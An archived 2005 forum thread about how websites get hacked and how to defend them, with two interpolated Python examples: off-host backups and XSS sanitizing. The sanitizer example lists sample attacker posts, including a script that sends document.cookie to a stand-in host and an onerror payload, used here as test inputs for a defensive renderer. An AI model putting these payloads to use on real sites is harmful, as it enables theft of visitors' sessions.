The Forge Forums Read-only Archives
Topic: Hacking websites/forums and how to protect yourself (Read 4279 times)
Space Cowboy (Member, Posts: 74)
« on: March 14, 2005, 02:54:14 PM »
Hey all,
The Forge was recently hacked. Personally, I barely know enough about computers to get by, and since Wild Sphere's forums are under construction, I am understandably concerned that something equally malicious might happen to us in the future.
My questions are: Can folks point me in the direction of good, basic information about web hacking (e.g., how they work)? What are the most common and most difficult to repair types of hacks, and what can be done to protect against them?
Many thanks in advance!
Nature abhors a vacuum... Saddle up, Space Cowboy!
Wild Sphere(TM): A Cinematic Space Western RPG
http://www.wildsphere.com
DevP (Member, Posts: 576)
« Reply #1 on: March 14, 2005, 06:59:09 PM »
Well, I can tell you firstly, to make frequent backups (or figure out some system for doing so). Once you've got that, then even with hackings you'll be okay. You probably want a backup of the site, and frequent backups of the database that powers your forums and whatever else you've got. Beyond that, always getting the latest patches is key. Look for an RSS feed with news/updates for the software you're using.
Dev Purkayastha | 10by10room is a tumblelog | Come visit StoryGames Boston!
Rob Carriere (Member, Posts: 187)
« Reply #2 on: March 15, 2005, 06:13:37 AM »
Space Cowboy,
There are basically four types of attack you have to deal with:
1- Attacks against the network protocol stack. These are low-level attacks; they have nothing to do with what sort of website you offer, or even whether you offer a website. They are possible against any machine that is connected to the Internet.
The defenses are:
. Keep your operating system fully patched.
. Run your machines from behind a firewall.
. If possible, select your operating system with security in mind.
In your case, these are probably the worry of your hosting provider. If you are concerned, check their policies in this regard.
2- Attacks against the webserver. These are mid-level attacks, that depend only on the fact you are offering some sort of website.
The defenses are:
. Keep your webserver fully patched.
. Do not activate any webserver modules/plugins/whatevers that aren't actually needed for your website.
. If possible, select your webserver with security in mind.
Again, this would probably be up to your hosting provider. I took a quick look and it seems that your website is running Apache (good) and it is configured to not publish its configuration (better than 90-odd % of websites out there). Based on that, I suspect you may well have a security-conscious hosting provider. However, you should check to make sure.
3- Attacks against applications running on the website (such as a bulletin board, a wiki, a blog, or even something as silly as a visitor counter.) These are high-level attacks, that will obviously only work if your website is actually running the targeted application. (This is the reason for the defense under 2 above--if it ain't there, they can't hack it.)
The defenses are:
. Choose your applications wisely. Some programs are much more prone to security flaws than others and some programs are much better known than others. Obviously, the worst case is a well-known, poorly-programmed application. Sadly, phpBB comes close to qualifying. It usually has several security problems per year and it is probably the best-known bulletin board code, so these problems are invariably exploited and usually exploited quickly (under a week, in the case of the Forge).
. Keep your application fully patched.
. Be very, very careful with customization and configuration. Far more security problems originate in poor configuration than in poor applications (and, considering the quality of some apps, that's saying a lot!) If you don't understand the configuration, talk it through with, or defer it entirely to, somebody who does.
Between these three kinds of attack, there are many, many possible technical approaches. The good news is: you don't really care how they hack, you just care what they are hacking for. Again, there are a number of classes of goals, but in the wild we really only see three:
- Denial of service. The attack causes your site to be unreachable or otherwise useless. Two examples would be generating such massive amounts of fake traffic that your webserver can no longer handle the real traffic, and causing a crash of your webserver.
- Destruction of information. What happened with the Forge: somebody wiped all the data. A more subtle approach would be to introduce errors in the data (fake posts, for example)
- Theft of information. A favorite with sites that record sensitive data such as credit card numbers.
Recovery from Denial of Service consists mostly of waiting it out. Sooner or later the attack stops and life continues.
Recovery from destruction of information depends on having backups. Backups on the webserver are good, because they allow rapid recovery, but not sufficient, because a good hacker will destroy them as well (as happened with the Forge). So have a strategy to feed backups to a secure location...frequently.
There really is no good recovery from Theft of Information, other than waiting through the (usually long) period until the people whose information was stolen stop being mad at you and start trusting you again. For this reason, many sites transfer sensitive information off the webserver to somewhere more secure ASAP. (That means: within seconds.)
4- The fourth kind of attack is not against your site at all, but against your site's visitors via your site. The usual trick with a bulletin board is that I post something that contains code. Anybody who views my post will be running my (hidden) code in their browser. If this code is designed to exploit one of the many open security problems with Internet Explorer, I can do whatever I want on the computers of all your visitors...
The defense is to strip incoming posts of anything that even looks like it might be dangerous--the bulletin board code should be doing this work for you.
The most common problems with bulletin board sites are all input stripping related. Either type 3 or type 4 attacks may be possible if the input stripping isn't good enough in each and every place the software ever asks for input (which is many places!)
Was this the sort of info you were looking for?
SR
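Rob's point that the backups kept on The Forge's own server were wiped together with the site, and DevP's advice to back up the site and database frequently, come down to one design rule: the copy you restore from must live somewhere the webserver cannot delete. The block below is an added example, not The Forge's procedure nor anything either poster described. It models the two hosts as two directories, pushes a hashed archive into a write-once vault, applies retention on the vault side only, and refuses to restore an archive whose recorded digest no longer matches. The directory names, the retention count of two, and the constructed site files and dumps are assumptions for the demonstration.

```python
"""Off-host backups a compromised webserver cannot destroy, with integrity checks.

Added example, not The Forge's own procedure. Two hosts are modelled as two
directories: the webserver's root (anything the webserver can write, an intruder
running as the webserver can also delete) and a vault the webserver can only push
new archives into. File names and the retention count are assumptions."""
import hashlib
import io
import os
import tarfile
import tempfile
from datetime import datetime, timezone
from pathlib import Path


def make_archive(site_dir: Path, db_dump: bytes):
    """Webserver side: bundle site files plus a database dump into an in-memory
    tar.gz; return (bytes, sha256 hex) so the vault can verify what arrived."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        tar.add(str(site_dir), arcname="site")
        info = tarfile.TarInfo("db.sql")
        info.size = len(db_dump)
        tar.addfile(info, io.BytesIO(db_dump))
    data = buf.getvalue()
    return data, hashlib.sha256(data).hexdigest()


def push_to_vault(vault: Path, data: bytes, digest: str, keep: int = 7) -> Path:
    """Vault side: re-hash, write once (O_EXCL, never overwrite), store the digest
    beside the archive, then apply retention here. The webserver never gets a
    delete operation, which is what matters once an intruder owns it."""
    if hashlib.sha256(data).hexdigest() != digest:
        raise ValueError("archive hash mismatch: refusing corrupted upload")
    vault.mkdir(parents=True, exist_ok=True)
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%S.%fZ")
    target = vault / f"backup-{stamp}-{digest[:12]}.tar.gz"
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o440)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    target.with_name(target.name + ".sha256").write_text(digest + "\n")
    # Names sort by timestamp, so the oldest archives come first; keep >= 1.
    for old in sorted(vault.glob("backup-*.tar.gz"))[:-keep]:
        old.unlink()
        old.with_name(old.name + ".sha256").unlink()
    return target


def restore(archive: Path, dest: Path):
    """Verify the recorded digest, then extract, refusing members that could
    escape dest (absolute paths, '..', links). Returns the member names."""
    expected = archive.with_name(archive.name + ".sha256").read_text().strip()
    data = archive.read_bytes()
    if hashlib.sha256(data).hexdigest() != expected:
        raise ValueError(f"{archive.name}: digest mismatch, archive corrupt or tampered")
    names = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            path = Path(member.name)
            if path.is_absolute() or ".." in path.parts or member.issym() or member.islnk():
                raise ValueError(f"unsafe member in archive: {member.name}")
            tar.extract(member, str(dest))
            names.append(member.name)
    return names


def demo() -> dict:
    """Constructed run: a toy site, three pushes with keep=2, the newest archive
    altered afterwards, then a restore from the intact one. Returns a summary."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        web_root, vault, out = root / "webroot", root / "vault", root / "restore"
        (web_root / "forum").mkdir(parents=True)
        (web_root / "forum" / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (web_root / "forum" / "config.php").write_text("<?php $dbpass = 'example'; ?>\n")
        pushed = []
        for n in range(3):  # three backup runs; the constructed dump changes each time
            dump = f"INSERT INTO posts VALUES ({n}, 'post {n}');\n".encode()
            pushed.append(push_to_vault(vault, *make_archive(web_root, dump), keep=2))
        victim = pushed[-1]  # an intruder (or bit rot) alters the newest copy
        os.chmod(victim, 0o640)
        with open(victim, "ab") as f:
            f.write(b"\x00")
        try:
            restore(victim, out / "bad")
            tamper_detected = False
        except ValueError:
            tamper_detected = True
        members = restore(pushed[-2], out)
        return {
            "archives_in_vault": len(list(vault.glob("backup-*.tar.gz"))),
            "oldest_pruned": not pushed[0].exists(),
            "tamper_detected": tamper_detected,
            "restored_members": members,
            "restored_db": (out / "db.sql").read_text(),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the file performs the constructed run. In a real deployment the vault is a separate host reached with credentials that allow creating objects but not deleting or overwriting them (or the backup host pulls from the webserver, so the webserver holds no vault credentials at all), and the digests are also recorded somewhere outside the vault, since an intruder who reaches the vault could rewrite an archive and its sidecar together.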
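Rob's fourth category is what is now called stored cross-site scripting, and his remark that the stripping must catch anything that even looks dangerous, in every place the software accepts input, is the crux: a blocklist that deletes script tags misses event-handler attributes and javascript: links entirely. The block below is an added example, not phpBB's or The Forge's code. It shows that blocklist beside the approach that holds up, escaping the whole post and then re-introducing only a small allowlist of markup. The sample posts are constructed, and the BBCode subset (bold, and links with http/https targets only) is an assumption for the demonstration.

```python
"""Stored XSS through bulletin-board posts: deleting <script> tags is not
"input stripping"; escape everything, then allow a small markup subset.

Added example, not code from The Forge, phpBB or any poster in the thread.
Sample posts are constructed; the allowed BBCode subset is an assumption."""
import html
import re

# Constructed attacker posts. Only the first uses a <script> element; the
# others run code through an event-handler attribute and a javascript: link.
SAMPLE_POSTS = [
    "Great game! <script>location='http://evil.example/?c='+document.cookie</script>",
    'Look at this: <img src="x" onerror="alert(document.cookie)">',
    '<a href="javascript:alert(1)">click me</a> and [b]bold[/b]',
    "[url=http://www.wildsphere.com]Wild Sphere[/url] rules, 1 < 2 & 2 > 1",
]

_SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def naive_strip(post: str) -> str:
    """A blocklist: delete <script>...</script> and trust the rest as HTML.
    This is the kind of 'stripping' that leaves forum software exploitable."""
    return _SCRIPT_TAG.sub("", post)


# After html.escape no poster-supplied '<', '>', '"' or '&' survives, so the
# only HTML in the output is what these two patterns generate. [url] accepts
# only http/https targets, so a javascript: link cannot come back as a link.
_BOLD = re.compile(r"\[b\](.*?)\[/b\]", re.S)
_URL = re.compile(r"\[url=(https?://[^\]\s\"'<>]+)\](.*?)\[/url\]", re.S)


def render_post(post: str) -> str:
    """Escape everything first, then re-introduce a small allowlist of markup."""
    safe = html.escape(post, quote=True)
    safe = _BOLD.sub(r"<b>\1</b>", safe)
    safe = _URL.sub(r'<a href="\1" rel="nofollow">\2</a>', safe)
    return safe


# Rough detector used only to compare the two renderers: a live script element,
# a live tag carrying an event handler, or a javascript: link target.
_ACTIVE = re.compile(r"<script\b|<[^>]*\son\w+\s*=|href\s*=\s*[\"']?\s*javascript:", re.I)


def contains_active_content(rendered_html: str) -> bool:
    return _ACTIVE.search(rendered_html) is not None


def audit(posts=SAMPLE_POSTS):
    """Per post: (active content survives naive_strip, survives render_post)."""
    return [(contains_active_content(naive_strip(p)),
             contains_active_content(render_post(p))) for p in posts]


if __name__ == "__main__":
    for post, (naive_leaks, hardened_leaks) in zip(SAMPLE_POSTS, audit()):
        print(f"naive={'LEAKS' if naive_leaks else 'ok':5} "
              f"hardened={'LEAKS' if hardened_leaks else 'ok':5}  {post[:48]!r}")
        print("   ->", render_post(post))
```

The order inside render_post is the whole point: escaping happens before any markup is recognised, so poster text can never become a tag or attribute, and the allowlist patterns are the only place HTML is produced. Extending the subset (images, quotes, colours) means adding another pattern that generates fixed HTML from validated pieces, never letting raw poster HTML through.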
Ron Edwards (Global Moderator, Posts: 16490)
« Reply #3 on: March 15, 2005, 09:54:28 AM »
Hello,
Rob, thanks for being helpful, and I hope your contribution provides a good start.
I've decided, after deliberating for a while, that plenty of websites and other resources exist which can help developers guard against hacking. The Forge might do well to compile a list of such sources in the Publishing forum, but discussion about it isn't really on-topic here.
Best,
Ron
Space Cowboy (Member, Posts: 74)
« Reply #4 on: March 15, 2005, 01:27:34 PM »
Hey guys,
Thanks heaps for your posts. Very informative for a neophyte like myself. I'll also pass it along to my web designer.
Many thanks!
Nature abhors a vacuum... Saddle up, Space Cowboy!
Wild Sphere(TM): A Cinematic Space Western RPG
http://www.wildsphere.com
Space Cowboy (Member, Posts: 74)
« Reply #5 on: March 15, 2005, 01:28:18 PM »
Quote from: Ron Edwards
I've decided, after deliberating for a while, that plenty of websites and other resources exist which can help developers guard against hacking. The Forge might do well to compile a list of such sources in the Publishing forum, but discussion about it isn't really on-topic here.
Best,
Ron
Hey Ron,
If you want to move this thread over there, that's cool.
Cheers
Nature abhors a vacuum... Saddle up, Space Cowboy!
Wild Sphere(TM): A Cinematic Space Western RPG
http://www.wildsphere.com
Ron Edwards (Global Moderator, Posts: 16490)
« Reply #6 on: March 15, 2005, 01:37:23 PM »
When I need non-moderators' help in deciding what to do with a thread, I'll ask, thanks.
Some folks have already asked me about setting up a Publishing thread about this stuff, which I've approved.
This thread's now closed.
Best,
Ron